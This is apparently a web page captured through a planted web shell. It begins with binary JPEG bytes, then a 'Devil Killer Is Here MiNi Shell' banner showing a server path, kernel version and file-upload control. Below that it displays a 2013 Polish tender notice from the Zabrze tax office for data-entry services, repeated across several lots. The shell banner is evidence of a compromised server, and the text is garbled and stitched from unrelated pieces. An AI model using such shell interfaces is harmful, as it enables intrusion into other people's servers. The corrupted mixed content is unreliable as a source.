JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130718/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20130718/281502-N-2013.html

<p class="kh_header"><b>Zabrze: Wprowadzanie danych do systemów komputerowych oraz dodatkowe usługi biurowe na potrzeby Działu Egzekucji Administracyjnej.OL-1/251-5/PN-5/13</b><br>
<b>Numer ogłoszenia: 281502 - 2013; data zamieszczenia: 18.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Skarbowy w Zabrzu , ul. Bytomska 2, 41-800 Zabrze, woj. śląskie, tel. 032 2777699, faks 032 2777666.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wprowadzanie danych do systemów komputerowych oraz dodatkowe usługi biurowe na potrzeby Działu Egzekucji Administracyjnej.OL-1/251-5/PN-5/13.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie obejmuje wprowadzanie danych do systemu: 
 - informacji o zobowiązanym (INFOTAX/ANALIZATOR) do tytułów wykonawczych w aplikacji EGAPOLTAX - 40 sztuk w ciągu 1 godziny,
- informacji o dacie wszczęcia postępowania i zastosowaniu środka egzekucyjnego w aplikacji  EGAPOLTAX -15 zajęć na 1 godzinę,
- korespondencji wychodzącej w aplikacji Biblioteka Akt oraz wykonanie czynności  
nadawczych tj. zaklejanie korespondencji wychodzącej, wprowadzanie potwierdzeń odbioru do Biblioteki Akt oraz podział otrzymanych potwierdzeń odbioru z Urzędu Pocztowego-30 pozycji na 1 godzinę,
- odnotowywanie wpływów zrealizowanych kwot w aplikacji EGAPOLTAX-15 sztuk na 1 godzinę, 
- kompletowanie TW na rejonach-40 sztuk na 1 godzinę,
- archiwizacja akt egzekucyjnych-30 sztuk na godzinę,
Jedna część równa się jeden Wykonawca, w tym zadaniu zostanie wybranych dziewięciu Wykonawców.
Zamawiający dysponuje funduszami, które pozwalają na wynagrodzenie Wykonawcy w wysokości nie większej niż 8,30 złotych brutto za jedną godzinę.
Na każdą część zadania zostało przewidziane  664 godziny.
Termin realizacji zadania od 19 sierpnia 2013r. do 20 grudnia 2013 r.
Zamawiający zastrzega sobie prawo zakończenia umowy w momencie wyczerpania dokumentów do wprowadzania.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 72.31.20.00-5, 79.50.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 9.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 19.08.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca złoży oświadczenie o znajomości programu komputerowego- Załącznik nr 6 do SIWZ - Zadanie nr 1 -doświadczenie w zakresie obsługi programów: EGAPOLTAX, Biblioteka Akt.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeżeli w dniu składania oferty osoby będą miały ukończone 18 lat i ukończoną szkołę średnią- należy wypełnić oświadczenie Załącznik nr 7 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pełnomocnictwo do reprezentowania wykonawcy, o ile ofertę składa pełnomocnik</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.isnet.katowice.pl/us/zabrze.htm<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Skarbowy w Zabrzu ul. Bytomska 2 41-800 Zabrze.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.08.2013 godzina 09:00, miejsce: Urząd Skarbowy w Zabrzu ul. Bytomska 2 41-800 Zabrze pokój 510...</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wprowadzanie danych do systemów komputerowych oraz dodatkowe usługi biurowe na potrzeby Działu Egzekucji Administracyjnej.
 OL-1/251-5/PN-5/13..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie obejmuje wprowadzanie danych do systemu: 
 - informacji o zobowiązanym (INFOTAX/ANALIZATOR) do tytułów wykonawczych w aplikacji EGAPOLTAX - 40 sztuk w ciągu 1 godziny,
- informacji o dacie wszczęcia postępowania i zastosowaniu środka egzekucyjnego w aplikacji  EGAPOLTAX -15 zajęć na 1 godzinę,
- korespondencji wychodzącej w aplikacji Biblioteka Akt oraz wykonanie czynności  
nadawczych tj. zaklejanie korespondencji wychodzącej, wprowadzanie potwierdzeń odbioru  
do Biblioteki Akt oraz podział otrzymanych potwierdzeń odbioru z Urzędu Pocztowego-30 pozycji na 1 godzinę,
- odnotowywanie wpływów zrealizowanych kwot w aplikacji EGAPOLTAX-15 sztuk na 1 godzinę, 
- kompletowanie TW na rejonach-40 sztuk na 1 godzinę,
- archiwizacja akt egzekucyjnych-30 sztuk na godzinę,
Jedna część równa się jeden Wykonawca, w tym zadaniu zostanie wybranych dziewięciu Wykonawców.
Zamawiający dysponuje funduszami, które pozwalają na wynagrodzenie Wykonawcy w wysokości nie większej niż 8,30 złotych brutto za jedną godzinę.
Na każdą część zadania zostało przewidziane  664 godziny.
Termin realizacji zadania od 19 sierpnia 2013r. do 20 grudnia 2013 r.
Zamawiający zastrzega sobie prawo zakończenia umowy w momencie wyczerpania dokumentów do wprowadzania.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 72.31.20.00-5, 79.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 19.08.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wprowadzanie danych do systemów komputerowych oraz dodatkowe usługi biurowe na potrzeby Działu Egzekucji Administracyjnej. 
OL-1/251-5/PN-5/13.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie obejmuje wprowadzanie danych do systemu: 
 - informacji o zobowiązanym (INFOTAX/ANALIZATOR) do tytułów wykonawczych w aplikacji EGAPOLTAX - 40 sztuk w ciągu 1 godziny,
- informacji o dacie wszczęcia postępowania i zastosowaniu środka egzekucyjnego w aplikacji  EGAPOLTAX -15 zajęć na 1 godzinę,
- korespondencji wychodzącej w aplikacji Biblioteka Akt oraz wykonanie czynności  
nadawczych tj. zaklejanie korespondencji wychodzącej, wprowadzanie potwierdzeń odbioru  
do Biblioteki Akt oraz podział otrzymanych potwierdzeń odbioru z Urzędu Pocztowego-30 pozycji na 1 godzinę,
- odnotowywanie wpływów zrealizowanych kwot w aplikacji EGAPOLTAX-15 sztuk na 1 godzinę, 
- kompletowanie TW na rejonach-40 sztuk na 1 godzinę,
- archiwizacja akt egzekucyjnych-30 sztuk na godzinę,
Jedna część równa się jeden Wykonawca, w tym zadaniu zostanie wybranych dziewięciu Wykonawców.
Zamawiający dysponuje funduszami, które pozwalają na wynagrodzenie Wykonawcy w wysokości nie większej niż 8,30 złotych brutto za jedną godzinę.
Na każdą część zadania zostało przewidziane  664 godziny.
Termin realizacji zadania od 19 sierpnia 2013r. do 20 grudnia 2013 r.
Zamawiający zastrzega sobie prawo zakończenia umowy w momencie wyczerpania dokumentów do wprowadzania.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 72.31.20.00-5, 79.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 19.08.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Wprowadzanie danych do systemów komputerowych oraz dodatkowe usługi biurowe na potrzeby Działu Egzekucji Administracyjnej. 
OL-1/251-5/PN-5/13.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie obejmuje wprowadzanie danych do systemu: 
 - informacji o zobowiązanym (INFOTAX/ANALIZATOR) do tytułów wykonawczych w aplikacji EGAPOLTAX - 40 sztuk w ciągu 1 godziny,
- informacji o dacie wszczęcia postępowania i zastosowaniu środka egzekucyjnego w aplikacji  EGAPOLTAX -15 zajęć na 1 godzinę,
- korespondencji wychodzącej w aplikacji Biblioteka Akt oraz wykonanie czynności  
nadawczych tj. zaklejanie korespondencji wychodzącej, wprowadzanie potwierdzeń odbioru  
do Biblioteki Akt oraz podział otrzymanych potwierdzeń odbioru z Urzędu Pocztowego-30 pozycji na 1 godzinę,
- odnotowywanie wpływów zrealizowanych kwot w aplikacji EGAPOLTAX-15 sztuk na 1 godzinę, 
- kompletowanie TW na rejonach-40 sztuk na 1 godzinę,
- archiwizacja akt egzekucyjnych-30 sztuk na godzinę,
Jedna część równa się jeden Wykonawca, w tym zadaniu zostanie wybranych dziewięciu Wykonawców.
Zamawiający dysponuje funduszami, które pozwalają na wynagrodzenie Wykonawcy w wysokości nie większej niż 8,30 złotych brutto za jedną godzinę.
Na każdą część zadania zostało przewidziane  664 godziny.
Termin realizacji zadania od 19 sierpnia 2013r. do 20 grudnia 2013 r.
Zamawiający zastrzega sobie prawo zakończenia umowy w momencie wyczerpania dokumentów do wprowadzania.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 72.31.20.00-5, 79.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 19.08.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Wprowadzanie danych do systemów komputerowych oraz dodatkowe usługi biurowe na potrzeby Działu Egzekucji Administracyjnej. 
OL-1/251-5/PN-5/13.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie obejmuje wprowadzanie danych do systemu: 
 - informacji o zobowiązanym (INFOTAX/ANALIZATOR) do tytułów wykonawczych w aplikacji EGAPOLTAX - 40 sztuk w ciągu 1 godziny,
- informacji o dacie wszczęcia postępowania i zastosowaniu środka egzekucyjnego w aplikacji  EGAPOLTAX -15 zajęć na 1 godzinę,
- korespondencji wychodzącej w aplikacji Biblioteka Akt oraz wykonanie czynności  
nadawczych tj. zaklejanie korespondencji wychodzącej, wprowadzanie potwierdzeń odbioru  
do Biblioteki Akt oraz podział otrzymanych potwierdzeń odbioru z Urzędu Pocztowego-30 pozycji na 1 godzinę,
- odnotowywanie wpływów zrealizowanych kwot w aplikacji EGAPOLTAX-15 sztuk na 1 godzinę, 
- kompletowanie TW na rejonach-40 sztuk na 1 godzinę,
- archiwizacja akt egzekucyjnych-30 sztuk na godzinę,
Jedna część równa się jeden Wykonawca, w tym zadaniu zostanie wybranych dziewięciu Wykonawców.
Zamawiający dysponuje funduszami, które pozwalają na wynagrodzenie Wykonawcy w wysokości nie większej niż 8,30 złotych brutto za jedną godzinę.
Na każdą część zadania zostało przewidziane  664 godziny.
Termin realizacji zadania od 19 sierpnia 2013r. do 20 grudnia 2013 r.
Zamawiający zastrzega sobie prawo zakończenia umowy w momencie wyczerpania dokumentów do wprowadzania.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 72.31.20.00-5, 79.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 19.08.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Wprowadzanie danych do systemów komputerowych oraz dodatkowe usługi biurowe na potrzeby Działu Egzekucji Administracyjnej. 
OL-1/251-5/PN-5/13.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie obejmuje wprowadzanie danych do systemu: 
 - informacji o zobowiązanym (INFOTAX/ANALIZATOR) do tytułów wykonawczych w aplikacji EGAPOLTAX - 40 sztuk w ciągu 1 godziny,
- informacji o dacie wszczęcia postępowania i zastosowaniu środka egzekucyjnego w aplikacji  EGAPOLTAX -15 zajęć na 1 godzinę,
- korespondencji wychodzącej w aplikacji Biblioteka Akt oraz wykonanie czynności  
nadawczych tj. zaklejanie korespondencji wychodzącej, wprowadzanie potwierdzeń odbioru  
do Biblioteki Akt oraz podział otrzymanych potwierdzeń odbioru z Urzędu Pocztowego-30 pozycji na 1 godzinę,
- odnotowywanie wpływów zrealizowanych kwot w aplikacji EGAPOLTAX-15 sztuk na 1 godzinę, 
- kompletowanie TW na rejonach-40 sztuk na 1 godzinę,
- archiwizacja akt egzekucyjnych-30 sztuk na godzinę,
Jedna część równa się jeden Wykonawca, w tym zadaniu zostanie wybranych dziewięciu Wykonawców.
Zamawiający dysponuje funduszami, które pozwalają na wynagrodzenie Wykonawcy w wysokości nie większej niż 8,30 złotych brutto za jedną godzinę.
Na każdą część zadania zostało przewidziane  664 godziny.
Termin realizacji zadania od 19 sierpnia 2013r. do 20 grudnia 2013 r.
Zamawiający zastrzega sobie prawo zakończenia umowy w momencie wyczerpania dokumentów do wprowadzania.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 72.31.20.00-5, 79.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 19.08.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Wprowadzanie danych do systemów komputerowych oraz dodatkowe usługi biurowe na potrzeby Działu Egzekucji Administracyjnej.
OL-1/251-5/PN-5/13.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie obejmuje wprowadzanie danych do systemu: 
 - informacji o zobowiązanym (INFOTAX/ANALIZATOR) do tytułów wykonawczych w aplikacji EGAPOLTAX - 40 sztuk w ciągu 1 godziny,
- informacji o dacie wszczęcia postępowania i zastosowaniu środka egzekucyjnego w aplikacji  EGAPOLTAX -15 zajęć na 1 godzinę,
- korespondencji wychodzącej w aplikacji Biblioteka Akt oraz wykonanie czynności  
nadawczych tj. zaklejanie korespondencji wychodzącej, wprowadzanie potwierdzeń odbioru  
do Biblioteki Akt oraz podział otrzymanych potwierdzeń odbioru z Urzędu Pocztowego-30 pozycji na 1 godzinę,
- odnotowywanie wpływów zrealizowanych kwot w aplikacji EGAPOLTAX-15 sztuk na 1 godzinę, 
- kompletowanie TW na rejonach-40 sztuk na 1 godzinę,
- archiwizacja akt egzekucyjnych-30 sztuk na godzinę,
Jedna część równa się jeden Wykonawca, w tym zadaniu zostanie wybranych dziewięciu Wykonawców.
Zamawiający dysponuje funduszami, które pozwalają na wynagrodzenie Wykonawcy w wysokości nie większej niż 8,30 złotych brutto za jedną godzinę.
Na każdą część zadania zostało przewidziane  664 godziny.
Termin realizacji zadania od 19 sierpnia 2013r. do 20 grudnia 2013 r.
Zamawiający zastrzega sobie prawo zakończenia umowy w momencie wyczerpania dokumentów do wprowadzania.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 72.31.20.00-5, 79.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 19.08.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Wprowadzanie danych do systemów komputerowych oraz dodatkowe usługi biurowe na potrzeby Działu Egzekucji Administracyjnej. 
OL-1/251-5/PN-5/13.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie obejmuje wprowadzanie danych do systemu: 
 - informacji o zobowiązanym (INFOTAX/ANALIZATOR) do tytułów wykonawczych w aplikacji EGAPOLTAX - 40 sztuk w ciągu 1 godziny,
- informacji o dacie wszczęcia postępowania i zastosowaniu środka egzekucyjnego w aplikacji  EGAPOLTAX -15 zajęć na 1 godzinę,
- korespondencji wychodzącej w aplikacji Biblioteka Akt oraz wykonanie czynności  
nadawczych tj. zaklejanie korespondencji wychodzącej, wprowadzanie potwierdzeń odbioru  
do Biblioteki Akt oraz podział otrzymanych potwierdzeń odbioru z Urzędu Pocztowego-30 pozycji na 1 godzinę,
- odnotowywanie wpływów zrealizowanych kwot w aplikacji EGAPOLTAX-15 sztuk na 1 godzinę, 
- kompletowanie TW na rejonach-40 sztuk na 1 godzinę,
- archiwizacja akt egzekucyjnych-30 sztuk na godzinę,
Jedna część równa się jeden Wykonawca, w tym zadaniu zostanie wybranych dziewięciu Wykonawców.
Zamawiający dysponuje funduszami, które pozwalają na wynagrodzenie Wykonawcy w wysokości nie większej niż 8,30 złotych brutto za jedną godzinę.
Na każdą część zadania zostało przewidziane  664 godziny.
Termin realizacji zadania od 19 sierpnia 2013r. do 20 grudnia 2013 r.
Zamawiający zastrzega sobie prawo zakończenia umowy w momencie wyczerpania dokumentów do wprowadzania.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 72.31.20.00-5, 79.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 19.08.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
